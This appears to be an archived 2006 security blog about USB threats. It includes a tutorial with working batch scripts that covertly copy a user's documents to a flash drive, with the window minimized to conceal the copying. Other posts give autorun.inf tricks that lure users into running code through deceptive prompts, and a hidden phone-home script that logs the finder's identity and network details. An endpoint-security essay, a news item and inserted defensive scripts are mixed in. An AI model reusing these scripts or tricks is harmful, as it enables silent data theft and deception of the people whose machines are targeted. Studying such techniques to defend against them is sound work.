There has been a lot of talk about “Podslurping” as a new endpoint security threat. Podslurping involves using a removable media device, such as an iPod (hence the name), to copy documents from a computer onto the removable storage. Abe Usher introduced the concept a while back and developed a proof of concept, as well as an audit-only version which copied nothing and simply listed the documents the application could have taken.
But really, all Podslurping involves is copying files from one place to another. You do not need to develop any special application to do this, as Windows has the functions built right in: a simple batch file using xcopy will do. Let’s build on the autorun tutorial from last week and create an autorun.inf file that calls a couple of batch files.
First create an autorun.inf file that looks like this:
[autorun]
icon=lilguy.ico
open=start.bat
action=Click “OK” to enable USB flash drive
shell\open\command=start.bat
So we will use the autorun tricks from last week both to prompt the user to run the application and to run it when the drive is double clicked. In an actual attack, where a malicious user is attempting to steal information from a system, they would probably take advantage of the U3 autorun hack so that it runs silently with no prompt at all, but since we are just showing a proof of concept we don’t need this.
You will notice that autorun.inf executes start.bat. I am going to use this file to do two things: launch the batch file that does the actual slurping, and hide the command prompt by starting it minimized, which helps conceal exactly what I am doing:
@echo off
rem start the slurping script in its own minimized window, then close this one
@start /min slurp.bat
@exit
The next script is the one that actually copies the files. For this example, imagine I just want to copy all Word documents from the target user’s “My Documents” directory:
@echo off
rem %~d0 is the drive this script runs from (the flash drive); the folder is named after the target machine
mkdir %~d0\%computername% 2>nul
rem %userprofile% resolves the profile folder wherever it lives; straight quotes are required around the path
rem /s subdirectories, /c keep going on errors, /q quiet, /r overwrite read-only, /h hidden and system files,
rem /i treat the destination as a directory, /y never prompt
xcopy "%userprofile%\My Documents\*.doc" %~d0\%computername% /s /c /q /r /h /i /y
@cls
@exit
First I create a directory on my USB flash drive. “%~d0” is a batch variable that expands to the letter of the drive the script is running from, so I tell it to create a directory on my flash drive named after the computer, which keeps things separate if I audit multiple systems. The xcopy command then copies any file with a “.doc” extension it finds, descending into subdirectories and recreating the same directory tree under the target folder as exists under “My Documents”.
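For the audit-only variant mentioned at the top of the post, xcopy already has what we need: the /L switch lists what would be copied without writing anything. The script below is an added example, not from the original post; it assumes the same layout as slurp.bat (launched from the root of the flash drive, output folder named after the machine), and the extension list is my own choice.

```batch
@echo off
rem audit.bat - added example, not from the original post. Lists what slurp.bat
rem would have copied without copying anything: xcopy /L only prints the names.
setlocal
set "TARGET=%userprofile%\My Documents"
set "OUT=%~d0\%computername%"
set "LOG=%OUT%\manifest.txt"
if not exist "%OUT%" mkdir "%OUT%"

> "%LOG%" echo Audit of "%TARGET%" on %computername% as %username% at %date% %time%
rem Extension list is an assumption; extend it to whatever counts as valuable on the target.
for %%E in (doc xls ppt pdf txt) do (
    >> "%LOG%" echo.
    >> "%LOG%" echo === *.%%E ===
    rem /L list only, /S subdirectories, /C keep going on errors, /H hidden and system files
    xcopy "%TARGET%\*.%%E" "%OUT%\" /L /S /C /H >> "%LOG%" 2>nul
)
rem xcopy /L ends each run with "N File(s)", so the per-extension totals land in the manifest too.
attrib +h "%LOG%"
endlocal
exit
```

Launch it from start.bat exactly as slurp.bat is launched; the trailing exit closes the minimized window, so replace it with exit /b if you run the script by hand from an open prompt. The manifest is what you hand to the owner of the machine as evidence of exposure without ever having moved a document.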
This is just a quick example of podslurping and of how simple it really is. There are more malicious podslurping tools out there which do a better job of searching for specific files of value, hide themselves better, and even run in the background from startup, not just loading files onto a USB flash drive but actually sending them offsite via email, FTP or even VNC.
posted by akuma @ October 29, 2006 11:36 pm
FBI agents are investigating three USB flash drives that were discovered at a suspected meth lab. Jessica Quintana was a data entry clerk at Information Assets Management, a Los Alamos Nuclear Facility subcontractor. Some sources indicate that she worked in the X Division, which handles nuclear weapons design data.
According to the police report, three flash drives were part of the evidence collected; once police found that the data on them came from Los Alamos, the FBI was brought in.

So this is not exactly a “hack”, as there really was no technical wizardry involved in this data theft. And judging from what appears to be Miss Quintana’s MySpace page, she wasn’t exactly technical. So here we have a case where someone with limited technical knowledge, addicted to meth, was able to smuggle out three USB flash drives’ worth of nuclear weapons data.
I am glad to see our Homeland Security initiatives are working: we may be able to block ships coming out of North Korea with nuclear weapons technology, but meth addicts smuggling USB drives full of nuclear weapons data out of Los Alamos appears to be a problem.
Apparently USB flash drives have been banned from Los Alamos for the past two years, but it looks like some folks did not get the memo.
Imagine what could have been done by someone with more ( even basic) technical skills than Miss Quintana, using other techniques and tools (as we know) to install Trojans and other tools which could not only compromise the system the drive is connected to, but also the rest of the network.
Then we have the meth addict angle. Methamphetamine addicts are not exactly known for their loyalty; as their addiction worsens they will sell all of their possessions and steal whatever they can to make money for their next fix. One wonders whether any sort of drug screening occurs in order to work at the Los Alamos labs, but maybe the policies for subcontractors are different. However, an employee addicted to drugs makes the perfect mole. I am sure many terrorist groups and countries would have supplied Miss Quintana with all the meth she needed for the contents of those flash drives.
One also must wonder how many other USB flash drives full of nuclear secrets may exist out there. These three were discovered by accident; the FBI got lucky. If a meth user with limited technical skill can smuggle nuclear weapons data out of Los Alamos, who knows what more sophisticated thefts have occurred.
Full Police Report
posted by akuma @ October 26, 2006 11:52 pm
Disclaimer: This tutorial is designed to show existing vulnerabilities and should only be used on systems you own, or have permission to execute this on. Removable media devices don’t deploy malicious code and steal data, people do.
Autorun will not work with “regular” USB flash drives the way it does with CD-ROMs, but there are some tricks that come very close. I say “regular” because, as many may know, there are ways of modifying U3 drives so that they appear as CD-ROMs on Windows systems and can thus use autorun to silently run your “tools” without any indication anything is happening. The U3 hack is a bit more complicated, though; I will do another “How to” on that later. For now let’s just discuss how we can create an autorun.inf file on a regular ol’ USB flash drive that will do some interesting things.
Also it is important to mention that some of these techniques will even work if autoplay is disabled!
First, although we cannot have an application run automatically from a traditional USB drive, we can make it so that when the drive is plugged in, Windows makes a suggestion to the user, and all they need to do is click “OK” to run a specific application or script you have deployed to the flash drive.
First in Notepad create a file called autorun.inf and save it to the root of your USB flash drive of choice. In the autorun file put this:
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
The first parameter is “icon”. This tells Windows what icon to use for the drive. This is important for the social engineering portion of the trick; you must consider your target. The image you choose should help instill trust in the application they are about to run: maybe a tantalizing icon of a scantily clad babe, a puppy, or my favorite, a cute little cartoon devil holding a USB flash drive.
The “open” parameter indicates the program you wish to run. This can be an executable or, as in this case, a .bat file. You could even call a .bat file which calls a series of executables. Go crazy.
The next parameter is “action”; this is what triggers the autorun dialog to appear. The text will appear in the dialog box along with your icon, so you probably want to make it friendly, something like “Fun Game”. You probably don’t want to put something like “Click ‘OK’ to install backdoors and trojans!”.
Now unplug your flash drive and plug it back in; a dialog box like this should appear:

So this is not as good as automatically running the application, but it is useful nonetheless, and there have actually been successful simulations where it has been used. A security consultancy used this technique as a proof of concept to test a credit union client of theirs. Several drives used this simple technique to execute a trojan that sent some simple data to an external email account. They scattered the drives in the parking lot, several employees picked the drives up on their way into work, and within a short time the email account they had set up was receiving emails.
Now we have our basic autorun.inf set up. But notice that if you click Cancel and then click on the drive, you just see the contents of the drive. We can take this one step further: if the user is smart and their spidey senses are tingling from the dialog that appears and they click Cancel, the addition of one more line to the autorun.inf file will execute the code we specify when they open the drive from “My Computer” or Explorer. This is different from a true autorun, as it still requires the user to take an action to execute the application, but it is still a significant security risk.
Add the shell\open\command line so your autorun.inf file reads:
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shell\open\command=howdy.bat
OK, save it and then unplug and plug the drive back in again. This time when the prompt appears hit “Cancel”. Now double click the drive under “My Computer”. The application will execute. By the way, this second portion will still work even if autoplay is disabled on a system, and in my opinion it is actually more dangerous than the dialog.
So what if we don’t want to execute a command on the drive and just want to open a webpage? You could launch Explorer from your .bat file or from the executable you run, but there is a quick and easy way to do this in the autorun.inf file. Replace the last line with this instead:
[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shellexecute=http://www.usbhacks.com
There we have it. An introduction to the wonderful world of autorun.inf hacks for USB flash drives. Again, this should only be tested on your own system or systems you have permission to use this on; we are not responsible for your stupidity. Removable media devices don’t deploy malicious code and steal data, people do. Let us know if you have questions or further ideas, we might send you a free USB flash drive full o’ love ;-)
You can download the complete files used here, including a basic .bat file.
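Before plugging an unknown drive into anything you care about, it is worth reading its autorun.inf the way Explorer will. The script below is an added example, not from the original post or its download; it takes a drive letter, pulls out the keys that cause execution (open=, shellexecute=, the default shell= verb and any shell\<verb>\command=) and prints what each would run. Keep the post’s own caveat in mind: the shell\open\command hook is an Explorer verb, not autorun, so turning autoplay off does not stop it. (Later Windows versions and updates stopped honoring autorun.inf on USB flash drives altogether, so everything here applies to the XP-era systems the post targets.)

```batch
@echo off
rem inspect-autorun.bat - added example, not part of the original post.
rem Usage: inspect-autorun.bat E:   (defaults to the drive this script is on)
setlocal enabledelayedexpansion
set "DRIVE=%~1"
if "%DRIVE%"=="" set "DRIVE=%~d0"
set "INF=%DRIVE%\autorun.inf"
if not exist "%INF%" (
    echo No autorun.inf on %DRIVE%
    goto :eof
)
echo Inspecting "%INF%"
rem A hidden or system attribute on the file is itself a hint that someone wanted it overlooked.
attrib "%INF%"
echo.
rem tokens=1* splits each line at the first "=" into key and value;
rem eol=; skips comment lines; usebackq lets the file name be quoted.
for /f "usebackq eol=; tokens=1* delims==" %%K in ("%INF%") do (
    set "key=%%K"
    set "val=%%L"
    if /i "!key!"=="open"         echo   open           launches on AutoRun: !val!
    if /i "!key!"=="shellexecute" echo   shellexecute   launches on AutoRun: !val!
    if /i "!key!"=="shell"        echo   shell          default verb when the drive is opened: !val!
    if /i "!key:~0,6!"=="shell\"  echo   !key!   Explorer verb hook, not stopped by autoplay: !val!
    if /i "!key!"=="action"       echo   action         dialog text: !val!
    if /i "!key!"=="icon"         echo   icon           drive icon: !val!
    if /i "!key!"=="label"        echo   label          drive label: !val!
)
endlocal
```

Run it from a machine where autoplay is off and the drive has been opened with a right click and “Explore” rather than a double click, or better, mount the drive on a system you do not mind losing. Any shell\ line pointing at a file on the drive is exactly the trick described above, whatever the action text says.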
Questions, comments, ideas or death threats? Send them here.
posted by akuma @ October 25, 2006 10:08 pm
Surprisingly, I have been getting quite a few questions regarding specifically what endpoint security is and why it is important. Most security policies and technologies are focused on keeping people outside a network from getting in. Yet as we have seen in many headlines, the majority of security breaches and data thefts occur internally; some estimates even put the figure at 70% of all security breaches occurring behind the firewall.
Endpoint security is not a new concept, it is older than computers, it is simply protecting physical access to valuable assets. All IT security measures really go out the window once someone with the technical skills (and sometimes not so technical) has physical access to a system.
Using a small USB flash drive, one can own a system in seconds: installing Trojan programs that email or FTP data to a remote location in the background, gaining remote access to the system for later use, installing back doors including admin accounts, and infecting any other removable media device that is plugged into that system.
The greatest hacker tool available is an IT department’s own apathy when it comes to managing these security threats. Keeping the network perimeter secure is difficult enough without having to manage internal threats too.
Understanding endpoint security threats
At the core there are three areas of endpoint security threat that need to be considered. The first involves corporate espionage: evidence and actual cases have shown that employees have been recruited by rival companies and organized crime to steal pertinent data. The scope of these offenses ranges from the theft of intellectual property and customer lists to simply stealing employee lists for headhunters.
The second weakness again involves employees, only they may not need monetary motivation to steal data; they may be disgruntled or recently terminated and wish to harm the network, destroy data, or steal data for their next position.
The third main area that should be considered is pure ignorance: a data breach or damage to the network perpetrated unintentionally. For example, a user who installs unauthorized software, or an employee who plugs in a USB flash drive or other removable media device that is infected with a Trojan. Employees also fall victim to social engineering attacks through telephone calls, phishing scams or other methods.
A new attack vector has actually appeared where emails that appear to be simple marketing emails offering free USB drives are in fact targeted at specific users in a company, and the “free” drive the user receives in the mail is loaded with a Trojan that would allow someone outside the company direct access to that system to run reconnaissance scans, steal data, and launch attacks.
Prevention
Most corporate networks are doing the bare minimum when it comes to securing against internal threats, for several reasons. The first is ignorance of the actual issues; although this sounds silly, it rings true more often than most would like to admit. Most IT departments are already stretched beyond their limits in manpower and resources, so they have no choice but to trust employees and hope that no breaches occur, thereby ignoring the issue altogether. If trust, hope and ignorance are the three prongs of your approach to endpoint security, we will be seeing your company in the headlines soon.
Admit you have a problem
The first step to prevention is to realize you have a problem. You then must clearly establish policies regarding the use of removable media devices, including USB flash drives, iPods and even smart phones. It may also be necessary to consider who has access to CD/DVD burners.
Email is not just for viruses
Email attachments have been a nemesis of IT admins for a long time in terms of the propagation of viruses and worms, but very little has been done about what happens when employees email confidential data out to personal email accounts. Policies and auditing may need to be implemented to secure corporate data here too.
Printers
An employee who is locked out of removable media devices may just choose to print the data out. It might be necessary to set up auditing to show who has printed what documents, as well as to limit who has access to printers on the network.
Enforcement
A policy is useless unless users are both educated about it and understand why it is in place. Many times policies are not enforced because they may hinder productivity; however, there are technologies available that will help IT admins enforce these policies while still allowing specific users or groups access to particular devices.
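For the technical half of enforcement, here is what a removable-media policy looks like on a single XP-era host. This is an added example, not from the original post: it turns AutoRun off for every drive type and stops the USB mass-storage driver from loading, using the Start=4 plus usbstor.inf permissions approach from Microsoft KB823732. Run it as an administrator; /revert puts things back. It does not do the per-user or per-group exceptions the paragraph mentions; that takes a device-control product or Group Policy.

```batch
@echo off
rem usb-policy.bat - added example, not part of the original post. Run as an administrator.
rem   usb-policy.bat          apply the restrictions
rem   usb-policy.bat /revert  put the defaults back
setlocal
set "POL=HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
set "USBSTOR=HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR"
set "INF=%SystemRoot%\inf"

if /i "%~1"=="/revert" goto :revert

rem 1. AutoRun: NoDriveTypeAutoRun is a bitmask of drive types; 0xFF (255) disables it for all of them.
reg add "%POL%" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
rem 2. USB mass storage already known to this machine: Start=4 (disabled) keeps usbstor.sys from loading.
reg add "%USBSTOR%" /v Start /t REG_DWORD /d 4 /f
rem 3. USB mass storage never seen before: deny Everyone access to the driver's .inf/.pnf so Plug and Play
rem    cannot install it (the method in Microsoft KB823732). /E edits the ACL instead of replacing it.
cacls "%INF%\usbstor.inf" /E /D Everyone
cacls "%INF%\usbstor.pnf" /E /D Everyone
goto :show

:revert
rem Removing the policy value returns AutoRun to the per-user default; Start=3 (manual) is the driver's default.
reg delete "%POL%" /v NoDriveTypeAutoRun /f 2>nul
reg add "%USBSTOR%" /v Start /t REG_DWORD /d 3 /f
cacls "%INF%\usbstor.inf" /E /R Everyone
cacls "%INF%\usbstor.pnf" /E /R Everyone

:show
echo.
echo Current settings:
reg query "%POL%" /v NoDriveTypeAutoRun 2>nul
reg query "%USBSTOR%" /v Start
cacls "%INF%\usbstor.inf"
endlocal
```

A drive that is already mounted when this runs stays mounted until it is unplugged, and none of it touches CD/DVD burners, printers or email, so it is one control among the several the sections above call for, not a substitute for the policy itself. Keep the /revert path tested; a deny on usbstor.inf that nobody remembers is the kind of thing that turns into a help-desk ticket a year later.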
posted by akuma @ October 21, 2006 4:11 pm
A simple little technique to have your USB drive phone home if it is lost (or stolen). Taking this further, we may have a legitimate use for HAK5’s USB Hacksaw and USB Switchblade applications: if your USB drive is stolen and the owner’s system name or an antidote file is not present, you deploy various files to send data to a remote email address, plus other tools to make whoever stole your drive very sorry for what they have done.
posted by akuma @ 2:46 am
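One way to wire up the check the post describes, as an added example (not HAK5’s code or the post’s own): the owner’s machine name and the antidote file path are assumptions, and this version only records where the drive turned up rather than emailing anything.

```batch
@echo off
rem homeguard.bat - added example, not part of the original post or the HAK5 tools.
rem Point autorun.inf's open= and shell\open\command= at this file.
setlocal
rem Assumptions: the owner's machine name, and an antidote file the owner drops on
rem any other machine where the drive should stay quiet.
set "OWNER_PC=MYLAPTOP"
set "ANTIDOTE=%SystemDrive%\antidote.txt"
set "DROP=%~d0\found"
set "LOG=%DROP%\%computername%-%random%.txt"

rem Home, or a host the owner has marked safe: do nothing and close the window.
if /i "%computername%"=="%OWNER_PC%" exit
if exist "%ANTIDOTE%" exit

rem Anywhere else: note who has the drive and where it is, in a hidden folder on the drive itself.
if not exist "%DROP%" mkdir "%DROP%"
attrib +h "%DROP%"
(
    echo Drive %~d0 seen on %computername% as %userdomain%\%username% at %date% %time%
    echo.
    ipconfig /all
    echo.
    net view 2>nul
) > "%LOG%"
attrib +h "%LOG%"
rem Sending the log off the box by email or FTP, as the post describes, needs an external tool
rem carried on the drive; "ftp -s:script.txt" against a server you control is the simplest.
exit
```

The hidden folder fills up with one record per machine the drive has been opened on, which is already enough to tell a found drive from a stolen one when it comes back. The same autorun caveats from the earlier post apply: the user on the other end still has to click “OK” or open the drive before any of this runs, and a patched or non-Windows host will do nothing at all.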